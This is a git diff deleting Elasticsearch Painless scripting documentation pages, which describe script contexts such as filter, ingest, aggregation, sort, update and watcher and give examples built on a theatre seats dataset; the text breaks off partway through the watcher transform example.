a/docs/painless/painless-contexts/painless-filter-context.asciidoc b/docs/painless/painless-contexts/painless-filter-context.asciidoc deleted file mode 100644 index 65773cd9008..00000000000 --- a/docs/painless/painless-contexts/painless-filter-context.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[[painless-filter-context]] -=== Filter context - -Use a Painless script as a {ref}/query-dsl-script-query.html[filter] in a -query to include and exclude documents. - - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`doc` (`Map`, read-only):: - Contains the fields of the current document where each field is a - `List` of values. - -*Return* - -`boolean`:: - Return `true` if the current document should be returned as a result of - the query, and `false` otherwise. - - -*API* - -The standard <> is available. - -*Example* - -To run this example, first follow the steps in -<>. - -This script finds all unsold documents that cost less than $18. - -[source,Painless] ----- -doc['sold'].value == false && doc['cost'].value < 18 ----- - -Defining cost as a script parameter enables the cost to be configured -in the script query request. For example, the following request finds -all available theatre seats for evening performances that are under $18. - -[source,console] ----- -GET seats/_search -{ - "query": { - "bool": { - "filter": { - "script": { - "script": { - "source": "doc['sold'].value == false && doc['cost'].value < params.cost", - "params": { - "cost": 18 - } - } - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] \ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-ingest-processor-context.asciidoc b/docs/painless/painless-contexts/painless-ingest-processor-context.asciidoc deleted file mode 100644 index db0e365c02e..00000000000 --- a/docs/painless/painless-contexts/painless-ingest-processor-context.asciidoc +++ /dev/null @@ -1,143 +0,0 @@ -[[painless-ingest-processor-context]] -=== Ingest processor context - -Use a Painless script in an {ref}/script-processor.html[ingest processor] -to modify documents upon insertion. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -{ref}/mapping-index-field.html[`ctx['_index']`] (`String`):: - The name of the index. - -{ref}/mapping-type-field.html[`ctx['_type']`] (`String`):: - The type of document within an index. - -`ctx` (`Map`):: - Contains extracted JSON in a `Map` and `List` structure for the fields - that are part of the document. - -*Side Effects* - -{ref}/mapping-index-field.html[`ctx['_index']`]:: - Modify this to change the destination index for the current document. - -{ref}/mapping-type-field.html[`ctx['_type']`]:: - Modify this to change the type for the current document. - -`ctx` (`Map`):: - Modify the values in the `Map/List` structure to add, modify, or delete - the fields of a document. - -*Return* - -void:: - No expected return value. - -*API* - -The standard <> is available. - -*Example* - -To run this example, first follow the steps in -<>. - -The seat data contains: - -* A date in the format `YYYY-MM-DD` where the second digit of both month and day - is optional. -* A time in the format HH:MM* where the second digit of both hours and minutes - is optional. The star (*) represents either the `String` `AM` or `PM`. - -The following ingest script processes the date and time `Strings` and stores the -result in a `datetime` field. - -[source,Painless] ----- -String[] dateSplit = ctx.date.splitOnToken("-"); <1> -String year = dateSplit[0].trim(); -String month = dateSplit[1].trim(); - -if (month.length() == 1) { <2> - month = "0" + month; -} - -String day = dateSplit[2].trim(); - -if (day.length() == 1) { <3> - day = "0" + day; -} - -boolean pm = ctx.time.substring(ctx.time.length() - 2).equals("PM"); <4> -String[] timeSplit = ctx.time.substring(0, - ctx.time.length() - 2).splitOnToken(":"); <5> -int hours = Integer.parseInt(timeSplit[0].trim()); -int minutes = Integer.parseInt(timeSplit[1].trim()); - -if (pm) { <6> - hours += 12; -} - -String dts = year + "-" + month + "-" + day + "T" + - (hours < 10 ? "0" + hours : "" + hours) + ":" + - (minutes < 10 ? "0" + minutes : "" + minutes) + - ":00+08:00"; <7> - -ZonedDateTime dt = ZonedDateTime.parse( - dts, DateTimeFormatter.ISO_OFFSET_DATE_TIME); <8> -ctx.datetime = dt.getLong(ChronoField.INSTANT_SECONDS)*1000L; <9> ----- -<1> Uses the `splitOnToken` function to separate the date `String` from the - seat data into year, month, and day `Strings`. - Note:: - * The use of the `ctx` ingest processor context variable to retrieve the - data from the `date` field. -<2> Appends the <> `"0"` value to a single - digit month since the format of the seat data allows for this case. -<3> Appends the <> `"0"` value to a single - digit day since the format of the seat data allows for this case. -<4> Sets the <> - <> to `true` if the time `String` is a time - in the afternoon or evening. - Note:: - * The use of the `ctx` ingest processor context variable to retrieve the - data from the `time` field. -<5> Uses the `splitOnToken` function to separate the time `String` from the - seat data into hours and minutes `Strings`. - Note:: - * The use of the `substring` method to remove the `AM` or `PM` portion of - the time `String`. - * The use of the `ctx` ingest processor context variable to retrieve the - data from the `date` field. -<6> If the time `String` is an afternoon or evening value adds the - <> `12` to the existing hours to move to - a 24-hour based time. -<7> Builds a new time `String` that is parsable using existing API methods. -<8> Creates a `ZonedDateTime` <> value by using - the API method `parse` to parse the new time `String`. -<9> Sets the datetime field `datetime` to the number of milliseconds retrieved - from the API method `getLong`. - Note:: - * The use of the `ctx` ingest processor context variable to set the field - `datetime`. Manipulate each document's fields with the `ctx` variable as - each document is indexed. - -Submit the following request: - -[source,console] ----- -PUT /_ingest/pipeline/seats -{ - "description": "update datetime for seats", - "processors": [ - { - "script": { - "source": "String[] dateSplit = ctx.date.splitOnToken('-'); String year = dateSplit[0].trim(); String month = dateSplit[1].trim(); if (month.length() == 1) { month = '0' + month; } String day = dateSplit[2].trim(); if (day.length() == 1) { day = '0' + day; } boolean pm = ctx.time.substring(ctx.time.length() - 2).equals('PM'); String[] timeSplit = ctx.time.substring(0, ctx.time.length() - 2).splitOnToken(':'); int hours = Integer.parseInt(timeSplit[0].trim()); int minutes = Integer.parseInt(timeSplit[1].trim()); if (pm) { hours += 12; } String dts = year + '-' + month + '-' + day + 'T' + (hours < 10 ? '0' + hours : '' + hours) + ':' + (minutes < 10 ? '0' + minutes : '' + minutes) + ':00+08:00'; ZonedDateTime dt = ZonedDateTime.parse(dts, DateTimeFormatter.ISO_OFFSET_DATE_TIME); ctx.datetime = dt.getLong(ChronoField.INSTANT_SECONDS)*1000L;" - } - } - ] -} ----- diff --git a/docs/painless/painless-contexts/painless-metric-agg-combine-context.asciidoc b/docs/painless/painless-contexts/painless-metric-agg-combine-context.asciidoc deleted file mode 100644 index 5cc9ad8ecbb..00000000000 --- a/docs/painless/painless-contexts/painless-metric-agg-combine-context.asciidoc +++ /dev/null @@ -1,27 +0,0 @@ -[[painless-metric-agg-combine-context]] -=== Metric aggregation combine context - -Use a Painless script to -{ref}/search-aggregations-metrics-scripted-metric-aggregation.html[combine] -values for use in a scripted metric aggregation. A combine script is run once -per shard following a <> and is -optional as part of a full metric aggregation. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`state` (`Map`):: - `Map` with values available from the prior map script. - -*Return* - -`List`, `Map`, `String`, or primitive:: - A value collected for use in a - <>. If no reduce - script is specified, the value is used as part of the result. - -*API* - -The standard <> is available. diff --git a/docs/painless/painless-contexts/painless-metric-agg-init-context.asciidoc b/docs/painless/painless-contexts/painless-metric-agg-init-context.asciidoc deleted file mode 100644 index 8c0fddfa339..00000000000 --- a/docs/painless/painless-contexts/painless-metric-agg-init-context.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[painless-metric-agg-init-context]] -=== Metric aggregation initialization context - -Use a Painless script to -{ref}/search-aggregations-metrics-scripted-metric-aggregation.html[initialize] -values for use in a scripted metric aggregation. An initialization script is -run prior to document collection once per shard and is optional as part of the -full metric aggregation. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`state` (`Map`):: - Empty `Map` used to add values for use in a - <>. - -*Side Effects* - -`state` (`Map`):: - Add values to this `Map` to for use in a map. Additional values must - be of the type `Map`, `List`, `String` or primitive. - -*Return* - -`void`:: - No expected return value. - -*API* - -The standard <> is available. diff --git a/docs/painless/painless-contexts/painless-metric-agg-map-context.asciidoc b/docs/painless/painless-contexts/painless-metric-agg-map-context.asciidoc deleted file mode 100644 index a34308aa938..00000000000 --- a/docs/painless/painless-contexts/painless-metric-agg-map-context.asciidoc +++ /dev/null @@ -1,47 +0,0 @@ -[[painless-metric-agg-map-context]] -=== Metric aggregation map context - -Use a Painless script to -{ref}/search-aggregations-metrics-scripted-metric-aggregation.html[map] -values for use in a scripted metric aggregation. A map script is run once per -collected document following an optional -<> and is required as -part of a full metric aggregation. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`state` (`Map`):: - `Map` used to add values for processing in a - <> or to be returned from the aggregation. - -`doc` (`Map`, read-only):: - Contains the fields of the current document where each field is a - `List` of values. - -`_score` (`double` read-only):: - The similarity score of the current document. - -*Side Effects* - -`state` (`Map`):: - Use this `Map` to add values for processing in a combine script. - Additional values must be of the type `Map`, `List`, `String` or - primitive. The same `state` `Map` is shared between all aggregated documents - on a given shard. If an initialization script is provided as part of the - aggregation then values added from the initialization script are - available. If no combine script is specified, values must be - directly stored in `state` in a usable form. If no combine script and no - <> are specified, the - `state` values are used as the result. - -*Return* - -`void`:: - No expected return value. - -*API* - -The standard <> is available. diff --git a/docs/painless/painless-contexts/painless-metric-agg-reduce-context.asciidoc b/docs/painless/painless-contexts/painless-metric-agg-reduce-context.asciidoc deleted file mode 100644 index b492207ef44..00000000000 --- a/docs/painless/painless-contexts/painless-metric-agg-reduce-context.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[painless-metric-agg-reduce-context]] -=== Metric aggregation reduce context - -Use a Painless script to -{ref}/search-aggregations-metrics-scripted-metric-aggregation.html[reduce] -values to produce the result of a scripted metric aggregation. A reduce script -is run once on the coordinating node following a -<> (or a -<> if no combine script is -specified) and is optional as part of a full metric aggregation. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`states` (`Map`):: - `Map` with values available from the prior combine script (or a map - script if no combine script is specified). - -*Return* - -`List`, `Map`, `String`, or primitive:: - A value used as the result. - -*API* - -The standard <> is available. diff --git a/docs/painless/painless-contexts/painless-min-should-match-context.asciidoc b/docs/painless/painless-contexts/painless-min-should-match-context.asciidoc deleted file mode 100644 index 46bc2679de8..00000000000 --- a/docs/painless/painless-contexts/painless-min-should-match-context.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ -[[painless-min-should-match-context]] -=== Minimum should match context - -Use a Painless script to specify the -{ref}/query-dsl-terms-set-query.html[minimum] number of terms that a -specified field needs to match with for a document to be part of the query -results. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`params['num_terms']` (`int`, read-only):: - The number of terms specified to match with. - -`doc` (`Map`, read-only):: - Contains the fields of the current document where each field is a - `List` of values. - -*Return* - -`int`:: - The minimum number of terms required to match the current document. - -*API* - -The standard <> is available. - -*Example* - -To run this example, first follow the steps in -<>. - -Imagine that you want to find seats to performances by your favorite -actors. You have a list of favorite actors in mind, and you want -to find performances where the cast includes at least a certain -number of them. `terms_set` query with `minimum_should_match_script` -is a way to accomplish this. To make the query request more configurable, -you can define `min_actors_to_see` as a script parameter. - -To ensure that the parameter `min_actors_to_see` doesn't exceed -the number of favorite actors, you can use `num_term`s to get -the number of actors in the list and `Math.min` to get the lesser -of the two. - -[source,Painless] ----- -Math.min(params['num_terms'], params['min_actors_to_see']) ----- - -The following request finds seats to performances with at least -two of the three specified actors. - -[source,console] ----- -GET seats/_search -{ - "query": { - "terms_set": { - "actors": { - "terms": [ - "smith", - "earns", - "black" - ], - "minimum_should_match_script": { - "source": "Math.min(params['num_terms'], params['min_actors_to_see'])", - "params": { - "min_actors_to_see": 2 - } - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] - diff --git a/docs/painless/painless-contexts/painless-reindex-context.asciidoc b/docs/painless/painless-contexts/painless-reindex-context.asciidoc deleted file mode 100644 index 4ecf17f6cb7..00000000000 --- a/docs/painless/painless-contexts/painless-reindex-context.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ -[[painless-reindex-context]] -=== Reindex context - -Use a Painless script in a {ref}/docs-reindex.html[reindex] operation to -add, modify, or delete fields within each document in an original index as its -reindexed into a target index. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`ctx['op']` (`String`):: - The name of the operation. - -{ref}/mapping-routing-field.html[`ctx['_routing']`] (`String`):: - The value used to select a shard for document storage. - -{ref}/mapping-index-field.html[`ctx['_index']`] (`String`):: - The name of the index. - -{ref}/mapping-type-field.html[`ctx['_type']`] (`String`):: - The type of document within an index. - -{ref}/mapping-id-field.html[`ctx['_id']`] (`int`, read-only):: - The unique document id. - -`ctx['_version']` (`int`):: - The current version of the document. - -{ref}/mapping-source-field.html[`ctx['_source']`] (`Map`):: - Contains extracted JSON in a `Map` and `List` structure for the fields - existing in a stored document. - -*Side Effects* - -`ctx['op']`:: - Use the default of `index` to update a document. Set to `none` to - specify no operation or `delete` to delete the current document from - the index. - -{ref}/mapping-routing-field.html[`ctx['_routing']`]:: - Modify this to change the routing value for the current document. - -{ref}/mapping-index-field.html[`ctx['_index']`]:: - Modify this to change the destination index for the current document. - -{ref}/mapping-type-field.html[`ctx['_type']`]:: - Modify this to change the type for the current document. - -{ref}/mapping-id-field.html[`ctx['_id']`]:: - Modify this to change the id for the current document. - -`ctx['_version']` (`int`):: - Modify this to modify the version for the current document. - -{ref}/mapping-source-field.html[`ctx['_source']`]:: - Modify the values in the `Map/List` structure to add, modify, or delete - the fields of a document. - -*Return* - -`void`:: - No expected return value. - -*API* - -The standard <> is available. diff --git a/docs/painless/painless-contexts/painless-score-context.asciidoc b/docs/painless/painless-contexts/painless-score-context.asciidoc deleted file mode 100644 index d62ea600f73..00000000000 --- a/docs/painless/painless-contexts/painless-score-context.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ -[[painless-score-context]] -=== Score context - -Use a Painless script in a -{ref}/query-dsl-function-score-query.html[function score] to apply a new -score to documents returned from a query. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`doc` (`Map`, read-only):: - Contains the fields of the current document. For single-valued fields, - the value can be accessed via `doc['fieldname'].value`. For multi-valued - fields, this returns the first value; other values can be accessed - via `doc['fieldname'].get(index)` - -`_score` (`double` read-only):: - The similarity score of the current document. - -*Return* - -`double`:: - The score for the current document. - -*API* - -The standard <> is available. - -*Example* - -To run this example, first follow the steps in -<>. - -The following query finds all unsold seats, with lower 'row' values -scored higher. - -[source,console] --------------------------------------------------- -GET /seats/_search -{ - "query": { - "function_score": { - "query": { - "match": { - "sold": "false" - } - }, - "script_score": { - "script": { - "source": "1.0 / doc['row'].value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:seats] \ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-similarity-context.asciidoc b/docs/painless/painless-contexts/painless-similarity-context.asciidoc deleted file mode 100644 index 98eff19a194..00000000000 --- a/docs/painless/painless-contexts/painless-similarity-context.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ -[[painless-similarity-context]] -=== Similarity context - -Use a Painless script to create a -{ref}/index-modules-similarity.html[similarity] equation for scoring -documents in a query. - -*Variables* - -`weight` (`float`, read-only):: - The weight as calculated by a <> - -`query.boost` (`float`, read-only):: - The boost value if provided by the query. If this is not provided the - value is `1.0f`. - -`field.docCount` (`long`, read-only):: - The number of documents that have a value for the current field. - -`field.sumDocFreq` (`long`, read-only):: - The sum of all terms that exist for the current field. If this is not - available the value is `-1`. - -`field.sumTotalTermFreq` (`long`, read-only):: - The sum of occurrences in the index for all the terms that exist in the - current field. If this is not available the value is `-1`. - -`term.docFreq` (`long`, read-only):: - The number of documents that contain the current term in the index. - -`term.totalTermFreq` (`long`, read-only):: - The total occurrences of the current term in the index. - -`doc.length` (`long`, read-only):: - The number of tokens the current document has in the current field. This - is decoded from the stored {ref}/norms.html[norms] and may be approximate for - long fields - -`doc.freq` (`long`, read-only):: - The number of occurrences of the current term in the current - document for the current field. - -Note that the `query`, `field`, and `term` variables are also available to the -<>. They are more efficiently used -there, as they are constant for all documents. - -For queries that contain multiple terms, the script is called once for each -term with that term's calculated weight, and the results are summed. Note that some -terms might have a `doc.freq` value of `0` on a document, for example if a query -uses synonyms. - -*Return* - -`double`:: - The similarity score for the current document. - -*API* - -The standard <> is available. \ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-sort-context.asciidoc b/docs/painless/painless-contexts/painless-sort-context.asciidoc deleted file mode 100644 index d15d5b30811..00000000000 --- a/docs/painless/painless-contexts/painless-sort-context.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ -[[painless-sort-context]] -=== Sort context - -Use a Painless script to -{ref}/sort-search-results.html[sort] the documents in a query. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`doc` (`Map`, read-only):: - Contains the fields of the current document. For single-valued fields, - the value can be accessed via `doc['fieldname'].value`. For multi-valued - fields, this returns the first value; other values can be accessed - via `doc['fieldname'].get(index)` - -`_score` (`double` read-only):: - The similarity score of the current document. - -*Return* - -`double`:: - The score for the specified document. - -*API* - -The standard <> is available. - -*Example* - -To run this example, first follow the steps in -<>. - -To sort results by the length of the `theatre` field, submit the following query: - -[source,console] ----- -GET /_search -{ - "query": { - "term": { - "sold": "true" - } - }, - "sort": { - "_script": { - "type": "number", - "script": { - "lang": "painless", - "source": "doc['theatre'].value.length() * params.factor", - "params": { - "factor": 1.1 - } - }, - "order": "asc" - } - } -} ----- -// TEST[setup:seats] \ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-update-by-query-context.asciidoc b/docs/painless/painless-contexts/painless-update-by-query-context.asciidoc deleted file mode 100644 index d01e4a19d8c..00000000000 --- a/docs/painless/painless-contexts/painless-update-by-query-context.asciidoc +++ /dev/null @@ -1,95 +0,0 @@ -[[painless-update-by-query-context]] -=== Update by query context - -Use a Painless script in an -{ref}/docs-update-by-query.html[update by query] operation to add, -modify, or delete fields within each of a set of documents collected as the -result of query. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`ctx['op']` (`String`):: - The name of the operation. - -{ref}/mapping-routing-field.html[`ctx['_routing']`] (`String`, read-only):: - The value used to select a shard for document storage. - -{ref}/mapping-index-field.html[`ctx['_index']`] (`String`, read-only):: - The name of the index. - -{ref}/mapping-type-field.html[`ctx['_type']`] (`String`, read-only):: - The type of document within an index. - -{ref}/mapping-id-field.html[`ctx['_id']`] (`int`, read-only):: - The unique document id. - -`ctx['_version']` (`int`, read-only):: - The current version of the document. - -{ref}/mapping-source-field.html[`ctx['_source']`] (`Map`):: - Contains extracted JSON in a `Map` and `List` structure for the fields - existing in a stored document. - -*Side Effects* - -`ctx['op']`:: - Use the default of `index` to update a document. Set to `none` to - specify no operation or `delete` to delete the current document from - the index. - -{ref}/mapping-source-field.html[`ctx['_source']`]:: - Modify the values in the `Map/List` structure to add, modify, or delete - the fields of a document. - -*Return* - -`void`:: - No expected return value. - -*API* - -The standard <> is available. - -*Example* - -To run this example, first follow the steps in -<>. - -The following query finds all seats in a specific section that have not been -sold and lowers the price by 2: - -[source,console] --------------------------------------------------- -POST /seats/_update_by_query -{ - "query": { - "bool": { - "filter": [ - { - "range": { - "row": { - "lte": 3 - } - } - }, - { - "match": { - "sold": false - } - } - ] - } - }, - "script": { - "source": "ctx._source.cost -= params.discount", - "lang": "painless", - "params": { - "discount": 2 - } - } -} --------------------------------------------------- -// TEST[setup:seats] diff --git a/docs/painless/painless-contexts/painless-update-context.asciidoc b/docs/painless/painless-contexts/painless-update-context.asciidoc deleted file mode 100644 index b181f94bc16..00000000000 --- a/docs/painless/painless-contexts/painless-update-context.asciidoc +++ /dev/null @@ -1,78 +0,0 @@ -[[painless-update-context]] -=== Update context - -Use a Painless script in an {ref}/docs-update.html[update] operation to -add, modify, or delete fields within a single document. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`ctx['op']` (`String`):: - The name of the operation. - -{ref}/mapping-routing-field.html[`ctx['_routing']`] (`String`, read-only):: - The value used to select a shard for document storage. - -{ref}/mapping-index-field.html[`ctx['_index']`] (`String`, read-only):: - The name of the index. - -{ref}/mapping-type-field.html[`ctx['_type']`] (`String`, read-only):: - The type of document within an index. - -{ref}/mapping-id-field.html[`ctx['_id']`] (`int`, read-only):: - The unique document id. - -`ctx['_version']` (`int`, read-only):: - The current version of the document. - -`ctx['_now']` (`long`, read-only):: - The current timestamp in milliseconds. - -{ref}/mapping-source-field.html[`ctx['_source']`] (`Map`):: - Contains extracted JSON in a `Map` and `List` structure for the fields - existing in a stored document. - -*Side Effects* - -`ctx['op']`:: - Use the default of `index` to update a document. Set to `none` to - specify no operation or `delete` to delete the current document from - the index. - -{ref}/mapping-source-field.html[`ctx['_source']`]:: - Modify the values in the `Map/List` structure to add, modify, or delete - the fields of a document. - -*Return* - -`void`:: - No expected return value. - -*API* - -The standard <> is available. - -*Example* - -To run this example, first follow the steps in -<>. - -The following query updates a document to be sold, and sets the cost -to the actual price paid after discounts: - -[source,console] --------------------------------------------------- -POST /seats/_update/3 -{ - "script": { - "source": "ctx._source.sold = true; ctx._source.cost = params.sold_cost", - "lang": "painless", - "params": { - "sold_cost": 26 - } - } -} --------------------------------------------------- -// TEST[setup:seats] diff --git a/docs/painless/painless-contexts/painless-watcher-condition-context.asciidoc b/docs/painless/painless-contexts/painless-watcher-condition-context.asciidoc deleted file mode 100644 index 945c47646cc..00000000000 --- a/docs/painless/painless-contexts/painless-watcher-condition-context.asciidoc +++ /dev/null @@ -1,138 +0,0 @@ -[[painless-watcher-condition-context]] -=== Watcher condition context - -Use a Painless script as a {ref}/condition-script.html[watch condition] -that determines whether to execute a watch or a particular action within a watch. -Condition scripts return a Boolean value to indicate the status of the condition. - -include::painless-watcher-context-variables.asciidoc[] - -*Return* - -`boolean`:: - Expects `true` if the condition is met, and `false` if it is not. - -*API* - -The standard <> is available. - -*Example* - -[source,console] ----- -POST _watcher/watch/_execute -{ - "watch" : { - "trigger" : { "schedule" : { "interval" : "24h" } }, - "input" : { - "search" : { - "request" : { - "indices" : [ "seats" ], - "body" : { - "query" : { - "term": { "sold": "true"} - }, - "aggs" : { - "theatres" : { - "terms" : { "field" : "play" }, - "aggs" : { - "money" : { - "sum": { "field" : "cost" } - } - } - } - } - } - } - } - }, - "condition" : { - "script" : - """ - return ctx.payload.aggregations.theatres.buckets.stream() <1> - .filter(theatre -> theatre.money.value < 15000 || - theatre.money.value > 50000) <2> - .count() > 0 <3> - """ - }, - "actions" : { - "my_log" : { - "logging" : { - "text" : "The output of the search was : {{ctx.payload.aggregations.theatres.buckets}}" - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] - -<1> The Java Stream API is used in the condition. This API allows manipulation of -the elements of the list in a pipeline. -<2> The stream filter removes items that do not meet the filter criteria. -<3> If there is at least one item in the list, the condition evaluates to true and the watch is executed. - -The following action condition script controls execution of the my_log action based -on the value of the seats sold for the plays in the data set. The script aggregates -the total sold seats for each play and returns true if there is at least one play -that has sold over $50,000. - -[source,console] ----- -POST _watcher/watch/_execute -{ - "watch" : { - "trigger" : { "schedule" : { "interval" : "24h" } }, - "input" : { - "search" : { - "request" : { - "indices" : [ "seats" ], - "body" : { - "query" : { - "term": { "sold": "true"} - }, - "aggs" : { - "theatres" : { - "terms" : { "field" : "play" }, - "aggs" : { - "money" : { - "sum": { "field" : "cost" } - } - } - } - } - } - } - } - }, - "actions" : { - "my_log" : { - "condition": { <1> - "script" : - """ - return ctx.payload.aggregations.theatres.buckets.stream() - .anyMatch(theatre -> theatre.money.value > 50000) <2> - """ - }, - "logging" : { - "text" : "At least one play has grossed over $50,000: {{ctx.payload.aggregations.theatres.buckets}}" - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] - -This example uses a nearly identical condition as the previous example. The -differences below are subtle and are worth calling out. - -<1> The location of the condition is no longer at the top level, but is within -an individual action. -<2> Instead of a filter, `anyMatch` is used to return a boolean value - -The following example shows scripted watch and action conditions within the -context of a complete watch. This watch also uses a scripted -<>. - -include::painless-watcher-context-example.asciidoc[] diff --git a/docs/painless/painless-contexts/painless-watcher-context-example.asciidoc b/docs/painless/painless-contexts/painless-watcher-context-example.asciidoc deleted file mode 100644 index db1394416b6..00000000000 --- a/docs/painless/painless-contexts/painless-watcher-context-example.asciidoc +++ /dev/null @@ -1,159 +0,0 @@ -[source,console] ----- -POST _watcher/watch/_execute -{ - "watch" : { - "metadata" : { "high_threshold": 50000, "low_threshold": 15000 }, - "trigger" : { "schedule" : { "interval" : "24h" } }, - "input" : { - "search" : { - "request" : { - "indices" : [ "seats" ], - "body" : { - "query" : { - "term": { "sold": "true"} - }, - "aggs" : { - "theatres" : { - "terms" : { "field" : "play" }, - "aggs" : { - "money" : { - "sum": { "field" : "cost" } - } - } - } - } - } - } - } - }, - "condition" : { - "script" : - """ - return ctx.payload.aggregations.theatres.buckets.stream() - .anyMatch(theatre -> theatre.money.value < ctx.metadata.low_threshold || - theatre.money.value > ctx.metadata.high_threshold) - """ - }, - "transform" : { - "script": - """ - return [ - 'money_makers': ctx.payload.aggregations.theatres.buckets.stream() - .filter(t -> { - return t.money.value > ctx.metadata.high_threshold - }) - .map(t -> { - return ['play': t.key, 'total_value': t.money.value ] - }).collect(Collectors.toList()), - 'duds' : ctx.payload.aggregations.theatres.buckets.stream() - .filter(t -> { - return t.money.value < ctx.metadata.low_threshold - }) - .map(t -> { - return ['play': t.key, 'total_value': t.money.value ] - }).collect(Collectors.toList()) - ] - """ - }, - "actions" : { - "log_money_makers" : { - "condition": { - "script" : "return ctx.payload.money_makers.size() > 0" - }, - "transform": { - "script" : - """ - def formatter = NumberFormat.getCurrencyInstance(); - return [ - 'plays_value': ctx.payload.money_makers.stream() - .map(t-> formatter.format(t.total_value) + ' for the play ' + t.play) - .collect(Collectors.joining(", ")) - ] - """ - }, - "logging" : { - "text" : "The following plays contain the highest grossing total income: {{ctx.payload.plays_value}}" - } - }, - "log_duds" : { - "condition": { - "script" : "return ctx.payload.duds.size() > 0" - }, - "transform": { - "script" : - """ - def formatter = NumberFormat.getCurrencyInstance(); - return [ - 'plays_value': ctx.payload.duds.stream() - .map(t-> formatter.format(t.total_value) + ' for the play ' + t.play) - .collect(Collectors.joining(", ")) - ] - """ - }, - "logging" : { - "text" : "The following plays need more advertising due to their low total income: {{ctx.payload.plays_value}}" - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] - -The following example shows the use of metadata and transforming dates into a readable format. - -[source,console] ----- -POST _watcher/watch/_execute -{ - "watch" : { - "metadata" : { "min_hits": 10000 }, - "trigger" : { "schedule" : { "interval" : "24h" } }, - "input" : { - "search" : { - "request" : { - "indices" : [ "seats" ], - "body" : { - "query" : { - "term": { "sold": "true"} - }, - "aggs" : { - "theatres" : { - "terms" : { "field" : "play" }, - "aggs" : { - "money" : { - "sum": { "field" : "cost" } - } - } - } - } - } - } - } - }, - "condition" : { - "script" : - """ - return ctx.payload.hits.total > ctx.metadata.min_hits - """ - }, - "transform" : { - "script" : - """ - def theDate = ZonedDateTime.ofInstant(ctx.execution_time.toInstant(), ctx.execution_time.getZone()); - return ['human_date': DateTimeFormatter.RFC_1123_DATE_TIME.format(theDate), - 'aggregations': ctx.payload.aggregations] - """ - }, - "actions" : { - "my_log" : { - "logging" : { - "text" : "The watch was successfully executed on {{ctx.payload.human_date}} and contained {{ctx.payload.aggregations.theatres.buckets.size}} buckets" - } - } - } - } -} ----- -// TEST[skip: requires setup from other pages] \ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-watcher-context-variables.asciidoc b/docs/painless/painless-contexts/painless-watcher-context-variables.asciidoc deleted file mode 100644 index 71a00711091..00000000000 --- a/docs/painless/painless-contexts/painless-watcher-context-variables.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ -The following variables are available in all watcher contexts. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`ctx['watch_id']` (`String`, read-only):: - The id of the watch. - -`ctx['id']` (`String`, read-only):: - The server generated unique identifer for the run watch. - -`ctx['metadata']` (`Map`, read-only):: - Metadata can be added to the top level of the watch definition. This - is user defined and is typically used to consolidate duplicate values - in a watch. - -`ctx['execution_time']` (`ZonedDateTime`, read-only):: - The time the watch began execution. - -`ctx['trigger']['scheduled_time']` (`ZonedDateTime`, read-only):: - The scheduled trigger time for the watch. This is the time the - watch should be executed. - -`ctx['trigger']['triggered_time']` (`ZonedDateTime`, read-only):: - The actual trigger time for the watch. This is the time the - watch was triggered for execution. - -`ctx['payload']` (`Map`, read-only):: - The accessible watch data based upon the - {ref}/input.html[watch input]. - -*API* - - -The standard <> is available. - -To run this example, first follow the steps in -<>. diff --git a/docs/painless/painless-contexts/painless-watcher-transform-context.asciidoc b/docs/painless/painless-contexts/painless-watcher-transform-context.asciidoc deleted file mode 100644 index 9d71a5f2335..00000000000 --- a/docs/painless/painless-contexts/painless-watcher-transform-context.asciidoc +++ /dev/null @@ -1,157 +0,0 @@ -[[painless-watcher-transform-context]] -=== Watcher transform context - -Use a Painless script as a {ref}/transform-script.html[watch transform] -to transform a payload into a new payload for further use in the watch. -Transform scripts return an Object value of the new payload. - -include::painless-watcher-context-variables.asciidoc[] - -*Return* - -`Object`:: - The new payload. - -*API* - -The standard <> is available. - -*Example* - -[source,console] ----- -POST _watcher/watch/_execute -{ - "watch" : { - "trigger" : { "schedule" : { "interval" : "24h" } }, - "input" : { - "search" : { - "request" : { - "indices" : [ "seats" ], - "body" : { - "query" : { "term": { "sold": "true"} }, - "aggs" : { - "theatres" : { - "terms" : { "field" : "play" }, - "aggs" : { - "money" : { - "sum": { "field" : "cost" } - } - } - } - } - } - } - } - }, - "transform" : { - "script": - """ - return [ - 'money_makers': ctx.payload.aggregations.theatres.buckets.stream() <1> - .filter(t -> { <2> - return t.money.value > 50000 - }) - .map(t -> { <3> - return ['play': t.key, 'total_value': t.money.value ] - }).collect(Collectors.toList()), <4> - 'duds' : ctx.payload.aggregations.theatres.buckets.stream() <5> - .filter(t -> { - return t.money.value < 15000 - }) - .map(t -> { - return ['play': 